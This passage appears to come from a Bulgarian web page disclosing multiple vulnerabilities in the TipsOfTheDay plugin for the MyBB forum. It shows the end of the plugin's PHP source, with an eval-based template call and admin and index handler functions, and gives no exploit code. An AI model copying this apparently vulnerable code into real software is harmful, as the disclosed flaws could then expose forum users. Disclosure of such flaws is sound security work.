		eval("\$tips = \"".$templates->get("tipsoftheday")."\";");
	}
}

function tipsoftheday_action_handler(&$action)
{
	$action['tipsoftheday'] = array('active' => 'tipsoftheday', 'file' => '');
}

function tipsoftheday_admin_nav(&$sub_menu)
{
	tipsadmin::TipsAdmin()->AdminNav(&$sub_menu);
}

function tipsoftheday_admin()
{
	tipsadmin::TipsAdmin()->AdminTips();
}

function tipsoftheday_index()
{
	tipsoftheday::Tips()->Index_tips();
}

function tipsusers()
{
	Tips_Send_User::Tips()->Tips_Users();
}
?>
Rate this post
Брой прочитания на тази страница: 3475
TipsOfTheDay MyBB Plugin Multiple Vulnerabilities

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *